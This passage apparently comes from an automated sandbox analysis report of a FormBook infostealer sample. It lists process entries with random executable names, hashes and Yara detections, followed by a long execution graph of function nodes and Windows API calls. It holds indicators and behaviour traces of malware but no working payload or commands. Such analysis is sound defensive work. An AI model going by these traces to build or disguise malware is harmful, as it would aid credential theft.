                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Target ID:6
                                                                                                                              Start time:23:38:27
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:9
                                                                                                                              Start time:23:38:39
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                              Imagebase:0x7ff728280000
                                                                                                                              File size:676'768 bytes
                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:3.4%
                                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                Signature Coverage:7.5%
                                                                                                                                Total number of Nodes:2000
                                                                                                                                Total number of Limit Nodes:166
                                                                                                                                execution_graph 101003 723633 101004 72366a 101003->101004 101005 7236e7 101004->101005 101006 723688 101004->101006 101043 7236e5 101004->101043 101008 75d0cc 101005->101008 101009 7236ed 101005->101009 101010 723695 101006->101010 101011 72374b PostQuitMessage 101006->101011 101007 7236ca DefWindowProcW 101045 7236d8 101007->101045 101052 731070 10 API calls Mailbox 101008->101052 101012 7236f2 101009->101012 101013 723715 SetTimer RegisterWindowMessageW 101009->101013 101015 75d154 101010->101015 101016 7236a0 101010->101016 101011->101045 101018 75d06f 101012->101018 101019 7236f9 KillTimer 101012->101019 101021 72373e CreatePopupMenu 101013->101021 101013->101045 101068 782527 71 API calls _memset 101015->101068 101022 723755 101016->101022 101023 7236a8 101016->101023 101027 75d074 101018->101027 101028 75d0a8 MoveWindow 101018->101028 101048 72443a Shell_NotifyIconW _memset 101019->101048 101020 75d0f3 101053 731093 341 API calls Mailbox 101020->101053 101021->101045 101050 7244a0 64 API calls _memset 101022->101050 101024 7236b3 101023->101024 101035 75d139 101023->101035 101031 75d124 101024->101031 101036 7236be 101024->101036 101025 75d166 101025->101007 101025->101045 101032 75d097 SetFocus 101027->101032 101033 75d078 101027->101033 101028->101045 101066 782d36 81 API calls _memset 101031->101066 101032->101045 101033->101036 101037 75d081 101033->101037 101034 72370c 101049 723114 DeleteObject DestroyWindow Mailbox 101034->101049 101035->101007 101067 777c36 59 API calls Mailbox 101035->101067 101036->101007 101054 72443a Shell_NotifyIconW _memset 101036->101054 101051 731070 10 API calls Mailbox 101037->101051 101042 723764 101042->101045 101043->101007 101046 75d118 101055 72434a 101046->101055 101048->101034 101049->101045 101050->101042 101051->101045 101052->101020 101053->101036 101054->101046 101056 724375 _memset 101055->101056 101069 724182 101056->101069 101059 7243fa 101061 724430 Shell_NotifyIconW 101059->101061 101062 724414 Shell_NotifyIconW 101059->101062 101063 724422 101061->101063 101062->101063 101073 72407c 101063->101073 101065 724429 101065->101043 101066->101042 101067->101043 101068->101025 101070 724196 101069->101070 101071 75d423 101069->101071 101070->101059 101095 782f94 62 API calls _W_store_winword 101070->101095 101071->101070 101072 75d42c DestroyIcon 101071->101072 101072->101070 101074 724098 101073->101074 101075 72416f Mailbox 101073->101075 101096 727a16 101074->101096 101075->101065 101078 7240b3 101101 727bcc 101078->101101 101079 75d3c8 LoadStringW 101082 75d3e2 101079->101082 101081 7240c8 101081->101082 101083 7240d9 101081->101083 101084 727b2e 59 API calls 101082->101084 101085 7240e3 101083->101085 101086 724174 101083->101086 101089 75d3ec 101084->101089 101110 727b2e 101085->101110 101119 728047 101086->101119 101092 7240ed _memset _wcscpy 101089->101092 101123 727cab 101089->101123 101091 75d40e 101093 727cab 59 API calls 101091->101093 101094 724155 Shell_NotifyIconW 101092->101094 101093->101092 101094->101075 101095->101059 101130 740db6 101096->101130 101098 727a3b 101140 728029 101098->101140 101102 727c45 101101->101102 101103 727bd8 __NMSG_WRITE 101101->101103 101172 727d2c 101102->101172 101105 727c13 101103->101105 101106 727bee 101103->101106 101107 728029 59 API calls 101105->101107 101171 727f27 59 API calls Mailbox 101106->101171 101109 727bf6 _memmove 101107->101109 101109->101081 101111 727b40 101110->101111 101112 75ec6b 101110->101112 101180 727a51 101111->101180 101186 777bdb 59 API calls _memmove 101112->101186 101115 727b4c 101115->101092 101116 75ec75 101117 728047 59 API calls 101116->101117 101118 75ec7d Mailbox 101117->101118 101120 728052 101119->101120 101121 72805a 101119->101121 101187 727f77 59 API calls 2 library calls 101120->101187 101121->101092 101124 727cbf 101123->101124 101125 75ed4a 101123->101125 101188 727c50 101124->101188 101127 728029 59 API calls 101125->101127 101129 75ed55 __NMSG_WRITE _memmove 101127->101129 101128 727cca 101128->101091 101132 740dbe 101130->101132 101133 740dd8 101132->101133 101135 740ddc std::exception::exception 101132->101135 101143 74571c 101132->101143 101160 7433a1 DecodePointer 101132->101160 101133->101098 101161 74859b RaiseException 101135->101161 101137 740e06 101162 7484d1 58 API calls _free 101137->101162 101139 740e18 101139->101098 101141 740db6 Mailbox 59 API calls 101140->101141 101142 7240a6 101141->101142 101142->101078 101142->101079 101144 745797 101143->101144 101149 745728 101143->101149 101169 7433a1 DecodePointer 101144->101169 101146 745733 101146->101149 101163 74a16b 58 API calls __NMSG_WRITE 101146->101163 101164 74a1c8 58 API calls 6 library calls 101146->101164 101165 74309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101146->101165 101147 74579d 101170 748b28 58 API calls __getptd_noexit 101147->101170 101149->101146 101151 74575b RtlAllocateHeap 101149->101151 101154 745783 101149->101154 101158 745781 101149->101158 101166 7433a1 DecodePointer 101149->101166 101151->101149 101152 74578f 101151->101152 101152->101132 101167 748b28 58 API calls __getptd_noexit 101154->101167 101168 748b28 58 API calls __getptd_noexit 101158->101168 101160->101132 101161->101137 101162->101139 101163->101146 101164->101146 101166->101149 101167->101158 101168->101152 101169->101147 101170->101152 101171->101109 101173 727d43 _memmove 101172->101173 101174 727d3a 101172->101174 101173->101109 101174->101173 101176 727e4f 101174->101176 101177 727e62 101176->101177 101179 727e5f _memmove 101176->101179 101178 740db6 Mailbox 59 API calls 101177->101178 101178->101179 101179->101173 101181 727a5f 101180->101181 101185 727a85 _memmove 101180->101185 101182 740db6 Mailbox 59 API calls 101181->101182 101181->101185 101183 727ad4 101182->101183 101184 740db6 Mailbox 59 API calls 101183->101184 101184->101185 101185->101115 101186->101116 101187->101121 101189 727c5f __NMSG_WRITE 101188->101189 101190 728029 59 API calls 101189->101190 101191 727c70 _memmove 101189->101191 101192 75ed07 _memmove 101190->101192 101191->101128 101193 747c56 101194 747c62 _flsall 101193->101194 101230 749e08 GetStartupInfoW 101194->101230 101196 747c67 101232 748b7c GetProcessHeap 101196->101232 101198 747cbf 101199 747cca 101198->101199 101315 747da6 58 API calls 3 library calls 101198->101315 101233 749ae6 101199->101233 101202 747cd0 101203 747cdb __RTC_Initialize 101202->101203 101316 747da6 58 API calls 3 library calls 101202->101316 101254 74d5d2 101203->101254 101206 747cea 101207 747cf6 GetCommandLineW 101206->101207 101317 747da6 58 API calls 3 library calls 101206->101317 101273 754f23 GetEnvironmentStringsW 101207->101273 101210 747cf5 101210->101207 101213 747d10 101214 747d1b 101213->101214 101318 7430b5 58 API calls 3 library calls 101213->101318 101283 754d58 101214->101283 101217 747d21 101218 747d2c 101217->101218 101319 7430b5 58 API calls 3 library calls 101217->101319 101297 7430ef 101218->101297 101221 747d34 101222 747d3f __wwincmdln 101221->101222 101320 7430b5 58 API calls 3 library calls 101221->101320 101303 7247d0 101222->101303 101225 747d53 101226 747d62 101225->101226 101321 743358 58 API calls _doexit 101225->101321 101322 7430e0 58 API calls _doexit 101226->101322 101229 747d67 _flsall 101231 749e1e 101230->101231 101231->101196 101232->101198 101323 743187 36 API calls 2 library calls 101233->101323 101235 749aeb 101324 749d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 101235->101324 101237 749af0 101238 749af4 101237->101238 101326 749d8a TlsAlloc 101237->101326 101325 749b5c 61 API calls 2 library calls 101238->101325 101241 749af9 101241->101202 101242 749b06 101242->101238 101243 749b11 101242->101243 101327 7487d5 101243->101327 101246 749b53 101335 749b5c 61 API calls 2 library calls 101246->101335 101249 749b58 101249->101202 101250 749b32 101250->101246 101251 749b38 101250->101251 101334 749a33 58 API calls 4 library calls 101251->101334 101253 749b40 GetCurrentThreadId 101253->101202 101255 74d5de _flsall 101254->101255 101347 749c0b 101255->101347 101257 74d5e5 101258 7487d5 __calloc_crt 58 API calls 101257->101258 101259 74d5f6 101258->101259 101260 74d661 GetStartupInfoW 101259->101260 101263 74d601 _flsall @_EH4_CallFilterFunc@8 101259->101263 101261 74d7a5 101260->101261 101262 74d676 101260->101262 101264 74d86d 101261->101264 101267 74d7f2 GetStdHandle 101261->101267 101268 74d805 GetFileType 101261->101268 101355 749e2b InitializeCriticalSectionAndSpinCount 101261->101355 101262->101261 101266 7487d5 __calloc_crt 58 API calls 101262->101266 101269 74d6c4 101262->101269 101263->101206 101356 74d87d LeaveCriticalSection _doexit 101264->101356 101266->101262 101267->101261 101268->101261 101269->101261 101270 74d6f8 GetFileType 101269->101270 101354 749e2b InitializeCriticalSectionAndSpinCount 101269->101354 101270->101269 101274 754f34 101273->101274 101275 747d06 101273->101275 101396 74881d 58 API calls 2 library calls 101274->101396 101279 754b1b GetModuleFileNameW 101275->101279 101277 754f5a _memmove 101278 754f70 FreeEnvironmentStringsW 101277->101278 101278->101275 101280 754b4f _wparse_cmdline 101279->101280 101282 754b8f _wparse_cmdline 101280->101282 101397 74881d 58 API calls 2 library calls 101280->101397 101282->101213 101284 754d71 __NMSG_WRITE 101283->101284 101288 754d69 101283->101288 101285 7487d5 __calloc_crt 58 API calls 101284->101285 101286 754d9a __NMSG_WRITE 101285->101286 101286->101288 101289 7487d5 __calloc_crt 58 API calls 101286->101289 101290 754df1 101286->101290 101291 754e16 101286->101291 101294 754e2d 101286->101294 101398 754607 58 API calls ___crtsetenv 101286->101398 101287 742d55 _free 58 API calls 101287->101288 101288->101217 101289->101286 101290->101287 101292 742d55 _free 58 API calls 101291->101292 101292->101288 101399 748dc6 IsProcessorFeaturePresent 101294->101399 101296 754e39 101296->101217 101298 7430fb __IsNonwritableInCurrentImage 101297->101298 101422 74a4d1 101298->101422 101300 743119 __initterm_e 101302 743138 _doexit __IsNonwritableInCurrentImage 101300->101302 101425 742d40 101300->101425 101302->101221 101304 7247ea 101303->101304 101314 724889 101303->101314 101305 724824 IsThemeActive 101304->101305 101460 74336c 101305->101460 101309 724850 101472 7248fd SystemParametersInfoW SystemParametersInfoW 101309->101472 101311 72485c 101473 723b3a 101311->101473 101313 724864 SystemParametersInfoW 101313->101314 101314->101225 101315->101199 101316->101203 101317->101210 101321->101226 101322->101229 101323->101235 101324->101237 101325->101241 101326->101242 101328 7487dc 101327->101328 101330 748817 101328->101330 101332 7487fa 101328->101332 101336 7551f6 101328->101336 101330->101246 101333 749de6 TlsSetValue 101330->101333 101332->101328 101332->101330 101344 74a132 Sleep 101332->101344 101333->101250 101334->101253 101335->101249 101337 755201 101336->101337 101341 75521c 101336->101341 101338 75520d 101337->101338 101337->101341 101345 748b28 58 API calls __getptd_noexit 101338->101345 101339 75522c RtlAllocateHeap 101339->101341 101342 755212 101339->101342 101341->101339 101341->101342 101346 7433a1 DecodePointer 101341->101346 101342->101328 101344->101332 101345->101342 101346->101341 101348 749c1c 101347->101348 101349 749c2f EnterCriticalSection 101347->101349 101357 749c93 101348->101357 101349->101257 101351 749c22 101351->101349 101381 7430b5 58 API calls 3 library calls 101351->101381 101354->101269 101355->101261 101356->101263 101358 749c9f _flsall 101357->101358 101359 749cc0 101358->101359 101360 749ca8 101358->101360 101372 749ce1 _flsall 101359->101372 101385 74881d 58 API calls 2 library calls 101359->101385 101382 74a16b 58 API calls __NMSG_WRITE 101360->101382 101362 749cad 101383 74a1c8 58 API calls 6 library calls 101362->101383 101365 749cd5 101366 749cdc 101365->101366 101367 749ceb 101365->101367 101386 748b28 58 API calls __getptd_noexit 101366->101386 101370 749c0b __lock 58 API calls 101367->101370 101368 749cb4 101384 74309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101368->101384 101373 749cf2 101370->101373 101372->101351 101375 749d17 101373->101375 101376 749cff 101373->101376 101388 742d55 101375->101388 101387 749e2b InitializeCriticalSectionAndSpinCount 101376->101387 101379 749d0b 101394 749d33 LeaveCriticalSection _doexit 101379->101394 101382->101362 101383->101368 101385->101365 101386->101372 101387->101379 101389 742d5e RtlFreeHeap 101388->101389 101390 742d87 _free 101388->101390 101389->101390 101391 742d73 101389->101391 101390->101379 101395 748b28 58 API calls __getptd_noexit 101391->101395 101393 742d79 GetLastError 101393->101390 101394->101372 101395->101393 101396->101277 101397->101282 101398->101286 101400 748dd1 101399->101400 101405 748c59 101400->101405 101404 748dec 101404->101296 101406 748c73 _memset __call_reportfault 101405->101406 101407 748c93 IsDebuggerPresent 101406->101407 101413 74a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101407->101413 101410 748d57 __call_reportfault 101414 74c5f6 101410->101414 101411 748d7a 101412 74a140 GetCurrentProcess TerminateProcess 101411->101412 101412->101404 101413->101410 101415 74c600 IsProcessorFeaturePresent 101414->101415 101416 74c5fe 101414->101416 101418 75590a 101415->101418 101416->101411 101421 7558b9 5 API calls 2 library calls 101418->101421 101420 7559ed 101420->101411 101421->101420 101423 74a4d4 EncodePointer 101422->101423 101423->101423 101424 74a4ee 101423->101424 101424->101300 101428 742c44 101425->101428 101427 742d4b 101427->101302 101429 742c50 _flsall 101428->101429 101436 743217 101429->101436 101435 742c77 _flsall 101435->101427 101437 749c0b __lock 58 API calls 101436->101437 101438 742c59 101437->101438 101439 742c88 DecodePointer DecodePointer 101438->101439 101440 742cb5 101439->101440 101441 742c65 101439->101441 101440->101441 101453 7487a4 59 API calls ___crtsetenv 101440->101453 101450 742c82 101441->101450 101443 742d18 EncodePointer EncodePointer 101443->101441 101444 742cc7 101444->101443 101445 742cec 101444->101445 101454 748864 61 API calls 2 library calls 101444->101454 101445->101441 101448 742d06 EncodePointer 101445->101448 101455 748864 61 API calls 2 library calls 101445->101455 101448->101443 101449 742d00 101449->101441 101449->101448 101456 743220 101450->101456 101453->101444 101454->101445 101455->101449 101459 749d75 LeaveCriticalSection 101456->101459 101458 742c87 101458->101435 101459->101458 101461 749c0b __lock 58 API calls 101460->101461 101462 743377 DecodePointer EncodePointer 101461->101462 101525 749d75 LeaveCriticalSection 101462->101525 101464 724849 101465 7433d4 101464->101465 101466 7433de 101465->101466 101467 7433f8 101465->101467 101466->101467 101526 748b28 58 API calls __getptd_noexit 101466->101526 101467->101309 101469 7433e8 101527 748db6 9 API calls ___crtsetenv 101469->101527 101471 7433f3 101471->101309 101472->101311 101474 723b47 __ftell_nolock 101473->101474 101528 727667 101474->101528 101478 723b7a IsDebuggerPresent 101479 75d272 MessageBoxA 101478->101479 101480 723b88 101478->101480 101483 75d28c 101479->101483 101481 723c61 101480->101481 101480->101483 101484 723ba5 101480->101484 101482 723c68 SetCurrentDirectoryW 101481->101482 101487 723c75 Mailbox 101482->101487 101732 727213 59 API calls Mailbox 101483->101732 101614 727285 101484->101614 101487->101313 101489 723bc3 GetFullPathNameW 101491 727bcc 59 API calls 101489->101491 101490 75d29c 101493 75d2b2 SetCurrentDirectoryW 101490->101493 101492 723bfe 101491->101492 101630 73092d 101492->101630 101493->101487 101496 723c1c 101497 723c26 101496->101497 101733 77874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101496->101733 101646 723a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101497->101646 101500 75d2cf 101500->101497 101504 75d2e0 101500->101504 101503 723c30 101505 723c43 101503->101505 101508 72434a 68 API calls 101503->101508 101734 724706 101504->101734 101654 7309d0 101505->101654 101507 75d2e8 101741 727de1 101507->101741 101508->101505 101511 723c4e 101511->101481 101731 72443a Shell_NotifyIconW _memset 101511->101731 101512 75d2f5 101513 75d324 101512->101513 101514 75d2ff 101512->101514 101517 727cab 59 API calls 101513->101517 101516 727cab 59 API calls 101514->101516 101518 75d30a 101516->101518 101519 75d320 GetForegroundWindow ShellExecuteW 101517->101519 101520 727b2e 59 API calls 101518->101520 101523 75d354 Mailbox 101519->101523 101522 75d317 101520->101522 101524 727cab 59 API calls 101522->101524 101523->101481 101524->101519 101525->101464 101526->101469 101527->101471 101529 740db6 Mailbox 59 API calls 101528->101529 101530 727688 101529->101530 101531 740db6 Mailbox 59 API calls 101530->101531 101532 723b51 GetCurrentDirectoryW 101531->101532 101533 723766 101532->101533 101534 727667 59 API calls 101533->101534 101535 72377c 101534->101535 101745 723d31 101535->101745 101537 72379a 101538 724706 61 API calls 101537->101538 101539 7237ae 101538->101539 101540 727de1 59 API calls 101539->101540 101541 7237bb 101540->101541 101759 724ddd 101541->101759 101544 75d173 101826 78955b 101544->101826 101545 7237dc Mailbox 101549 728047 59 API calls 101545->101549 101548 75d192 101551 742d55 _free 58 API calls 101548->101551 101552 7237ef 101549->101552 101553 75d19f 101551->101553 101783 72928a 101552->101783 101555 724e4a 84 API calls 101553->101555 101557 75d1a8 101555->101557 101561 723ed0 59 API calls 101557->101561 101558 727de1 59 API calls 101559 723808 101558->101559 101786 7284c0 101559->101786 101563 75d1c3 101561->101563 101562 72381a Mailbox 101564 727de1 59 API calls 101562->101564 101566 723ed0 59 API calls 101563->101566 101565 723840 101564->101565 101568 7284c0 69 API calls 101565->101568 101567 75d1df 101566->101567 101569 724706 61 API calls 101567->101569 101570 72384f Mailbox 101568->101570 101571 75d204 101569->101571 101574 727667 59 API calls 101570->101574 101572 723ed0 59 API calls 101571->101572 101573 75d210 101572->101573 101575 728047 59 API calls 101573->101575 101576 72386d 101574->101576 101577 75d21e 101575->101577 101790 723ed0 101576->101790 101579 723ed0 59 API calls 101577->101579 101581 75d22d 101579->101581 101588 728047 59 API calls 101581->101588 101583 723887 101583->101557 101584 723891 101583->101584 101585 742efd _W_store_winword 60 API calls 101584->101585 101586 72389c 101585->101586 101586->101563 101587 7238a6 101586->101587 101590 742efd _W_store_winword 60 API calls 101587->101590 101589 75d24f 101588->101589 101591 723ed0 59 API calls 101589->101591 101592 7238b1 101590->101592 101593 75d25c 101591->101593 101592->101567 101594 7238bb 101592->101594 101593->101593 101595 742efd _W_store_winword 60 API calls 101594->101595 101596 7238c6 101595->101596 101596->101581 101597 723907 101596->101597 101599 723ed0 59 API calls 101596->101599 101597->101581 101598 723914 101597->101598 101806 7292ce 101598->101806 101601 7238ea 101599->101601 101603 728047 59 API calls 101601->101603 101605 7238f8 101603->101605 101607 723ed0 59 API calls 101605->101607 101607->101597 101609 72928a 59 API calls 101611 72394f 101609->101611 101610 728ee0 60 API calls 101610->101611 101611->101609 101611->101610 101612 723ed0 59 API calls 101611->101612 101613 723995 Mailbox 101611->101613 101612->101611 101613->101478 101615 727292 __ftell_nolock 101614->101615 101616 75ea22 _memset 101615->101616 101617 7272ab 101615->101617 101619 75ea3e GetOpenFileNameW 101616->101619 102454 724750 101617->102454 101621 75ea8d 101619->101621 101624 727bcc 59 API calls 101621->101624 101626 75eaa2 101624->101626 101626->101626 101627 7272c9 102482 72686a 101627->102482 101631 73093a __ftell_nolock 101630->101631 102743 726d80 101631->102743 101633 73093f 101645 723c14 101633->101645 102754 73119e 89 API calls 101633->102754 101635 73094c 101635->101645 102755 733ee7 91 API calls Mailbox 101635->102755 101637 730955 101638 730959 GetFullPathNameW 101637->101638 101637->101645 101639 727bcc 59 API calls 101638->101639 101640 730985 101639->101640 101641 727bcc 59 API calls 101640->101641 101642 730992 101641->101642 101643 727bcc 59 API calls 101642->101643 101644 764cab _wcscat 101642->101644 101643->101645 101645->101490 101645->101496 101647 723ab0 LoadImageW RegisterClassExW 101646->101647 101648 75d261 101646->101648 102758 723041 7 API calls 101647->102758 102759 7247a0 LoadImageW EnumResourceNamesW 101648->102759 101651 723b34 101653 7239d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101651->101653 101652 75d26a 101653->101503 101655 764cc3 101654->101655 101667 7309f5 101654->101667 102815 789e4a 89 API calls 4 library calls 101655->102815 101657 730cfa 101657->101511 101660 730ee4 101660->101657 101662 730ef1 101660->101662 101661 730a4b PeekMessageW 101722 730a05 Mailbox 101661->101722 102813 731093 341 API calls Mailbox 101662->102813 101665 730ef8 LockWindowUpdate DestroyWindow GetMessageW 101665->101657 101669 730f2a 101665->101669 101666 730ce4 101666->101657 102812 731070 10 API calls Mailbox 101666->102812 101667->101722 102816 729e5d 60 API calls 101667->102816 102817 776349 341 API calls 101667->102817 101668 764e81 Sleep 101668->101722 101670 765c58 TranslateMessage DispatchMessageW GetMessageW 101669->101670 101670->101670 101672 765c88 101670->101672 101672->101657 101673 764d50 TranslateAcceleratorW 101674 730e43 PeekMessageW 101673->101674 101673->101722 101674->101722 101675 730ea5 TranslateMessage DispatchMessageW 101675->101674 101676 76581f WaitForSingleObject 101679 76583c GetExitCodeProcess CloseHandle 101676->101679 101676->101722 101678 730d13 timeGetTime 101678->101722 101715 730f95 101679->101715 101680 730e5f Sleep 101716 730e70 Mailbox 101680->101716 101681 728047 59 API calls 101681->101722 101682 727667 59 API calls 101682->101716 101683 765af8 Sleep 101683->101716 101685 740db6 59 API calls Mailbox 101685->101722 101687 74049f timeGetTime 101687->101716 101688 730f4e timeGetTime 102814 729e5d 60 API calls 101688->102814 101691 765b8f GetExitCodeProcess 101694 765ba5 WaitForSingleObject 101691->101694 101695 765bbb CloseHandle 101691->101695 101693 72b7dd 109 API calls 101693->101716 101694->101695 101694->101722 101695->101716 101697 72b73c 314 API calls 101697->101722 101699 7a5f25 110 API calls 101699->101716 101700 765874 101700->101715 101701 765078 Sleep 101701->101722 101702 765c17 Sleep 101702->101722 101704 727de1 59 API calls 101704->101716 101708 729e5d 60 API calls 101708->101722 101709 729ea0 314 API calls 101709->101722 101715->101511 101716->101682 101716->101687 101716->101691 101716->101693 101716->101699 101716->101700 101716->101701 101716->101702 101716->101704 101716->101715 101716->101722 102842 782408 60 API calls 101716->102842 102843 729e5d 60 API calls 101716->102843 102844 7289b3 69 API calls Mailbox 101716->102844 102845 72b73c 341 API calls 101716->102845 102846 7764da 60 API calls 101716->102846 102847 785244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101716->102847 102848 783c55 66 API calls Mailbox 101716->102848 101717 727de1 59 API calls 101717->101722 101718 789e4a 89 API calls 101718->101722 101720 7284c0 69 API calls 101720->101722 101721 729c90 59 API calls Mailbox 101721->101722 101722->101661 101722->101666 101722->101668 101722->101673 101722->101674 101722->101675 101722->101676 101722->101678 101722->101680 101722->101681 101722->101683 101722->101685 101722->101688 101722->101697 101722->101708 101722->101709 101722->101715 101722->101716 101722->101717 101722->101718 101722->101720 101722->101721 101724 7289b3 69 API calls 101722->101724 101725 7655d5 VariantClear 101722->101725 101726 77617e 59 API calls Mailbox 101722->101726 101727 76566b VariantClear 101722->101727 101728 728cd4 59 API calls Mailbox 101722->101728 101729 765419 VariantClear 101722->101729 101730 776e8f 59 API calls 101722->101730 102760 72e6a0 101722->102760 102791 72f460 101722->102791 102809 72e420 341 API calls 101722->102809 102810 72fce0 341 API calls 2 library calls 101722->102810 102811 7231ce IsDialogMessageW GetClassLongW 101722->102811 102818 7a6018 59 API calls 101722->102818 102819 789a15 59 API calls Mailbox 101722->102819 102820 77d4f2 59 API calls 101722->102820 102821 729837 101722->102821 102839 7760ef 59 API calls 2 library calls 101722->102839 102840 728401 59 API calls 101722->102840 102841 7282df 59 API calls Mailbox 101722->102841 101724->101722 101725->101722 101726->101722 101727->101722 101728->101722 101729->101722 101730->101722 101731->101481 101732->101490 101733->101500 101735 751940 __ftell_nolock 101734->101735 101736 724713 GetModuleFileNameW 101735->101736 101737 727de1 59 API calls 101736->101737 101738 724739 101737->101738 101739 724750 60 API calls 101738->101739 101740 724743 Mailbox 101739->101740 101740->101507 101742 727df0 __NMSG_WRITE _memmove 101741->101742 101743 740db6 Mailbox 59 API calls 101742->101743 101744 727e2e 101743->101744 101744->101512 101746 723d3e __ftell_nolock 101745->101746 101747 727bcc 59 API calls 101746->101747 101752 723ea4 Mailbox 101746->101752 101749 723d70 101747->101749 101756 723da6 Mailbox 101749->101756 101867 7279f2 101749->101867 101750 7279f2 59 API calls 101750->101756 101751 723e77 101751->101752 101753 727de1 59 API calls 101751->101753 101752->101537 101755 723e98 101753->101755 101754 727de1 59 API calls 101754->101756 101757 723f74 59 API calls 101755->101757 101756->101750 101756->101751 101756->101752 101756->101754 101870 723f74 101756->101870 101757->101752 101876 724bb5 101759->101876 101764 75d8e6 101767 724e4a 84 API calls 101764->101767 101765 724e08 LoadLibraryExW 101886 724b6a 101765->101886 101769 75d8ed 101767->101769 101771 724b6a 3 API calls 101769->101771 101773 75d8f5 101771->101773 101772 724e2f 101772->101773 101774 724e3b 101772->101774 101912 724f0b 101773->101912 101775 724e4a 84 API calls 101774->101775 101778 7237d4 101775->101778 101778->101544 101778->101545 101780 75d91c 101920 724ec7 101780->101920 101782 75d929 101784 740db6 Mailbox 59 API calls 101783->101784 101785 7237fb 101784->101785 101785->101558 101787 7284cb 101786->101787 101788 7284f2 101787->101788 102174 7289b3 69 API calls Mailbox 101787->102174 101788->101562 101791 723ef3 101790->101791 101792 723eda 101790->101792 101793 727bcc 59 API calls 101791->101793 101794 728047 59 API calls 101792->101794 101795 723879 101793->101795 101794->101795 101796 742efd 101795->101796 101797 742f7e 101796->101797 101798 742f09 101796->101798 102177 742f90 60 API calls 3 library calls 101797->102177 101805 742f2e 101798->101805 102175 748b28 58 API calls __getptd_noexit 101798->102175 101800 742f8b 101800->101583 101802 742f15 102176 748db6 9 API calls ___crtsetenv 101802->102176 101804 742f20 101804->101583 101805->101583 101807 7292d6 101806->101807 101808 740db6 Mailbox 59 API calls 101807->101808 101809 7292e4 101808->101809 101810 723924 101809->101810 102178 7291fc 59 API calls Mailbox 101809->102178 101812 729050 101810->101812 102179 729160 101812->102179 101814 72905f 101815 740db6 Mailbox 59 API calls 101814->101815 101816 723932 101814->101816 101815->101816 101817 728ee0 101816->101817 101818 75f17c 101817->101818 101820 728ef7 101817->101820 101818->101820 102189 728bdb 59 API calls Mailbox 101818->102189 101821 729040 101820->101821 101822 728ff8 101820->101822 101825 728fff 101820->101825 102188 729d3c 60 API calls Mailbox 101821->102188 101824 740db6 Mailbox 59 API calls 101822->101824 101824->101825 101825->101611 101827 724ee5 85 API calls 101826->101827 101828 7895ca 101827->101828 102190 789734 101828->102190 101831 724f0b 74 API calls 101832 7895f7 101831->101832 101833 724f0b 74 API calls 101832->101833 101834 789607 101833->101834 101835 724f0b 74 API calls 101834->101835 101836 789622 101835->101836 101837 724f0b 74 API calls 101836->101837 101838 78963d 101837->101838 101839 724ee5 85 API calls 101838->101839 101840 789654 101839->101840 101841 74571c __crtLCMapStringA_stat 58 API calls 101840->101841 101842 78965b 101841->101842 101843 74571c __crtLCMapStringA_stat 58 API calls 101842->101843 101844 789665 101843->101844 101845 724f0b 74 API calls 101844->101845 101846 789679 101845->101846 101847 789109 GetSystemTimeAsFileTime 101846->101847 101848 78968c 101847->101848 101849 7896a1 101848->101849 101850 7896b6 101848->101850 101853 742d55 _free 58 API calls 101849->101853 101851 78971b 101850->101851 101852 7896bc 101850->101852 101855 742d55 _free 58 API calls 101851->101855 102196 788b06 116 API calls __fcloseall 101852->102196 101856 7896a7 101853->101856 101858 75d186 101855->101858 101859 742d55 _free 58 API calls 101856->101859 101857 789713 101860 742d55 _free 58 API calls 101857->101860 101858->101548 101861 724e4a 101858->101861 101859->101858 101860->101858 101862 724e54 101861->101862 101864 724e5b 101861->101864 102197 7453a6 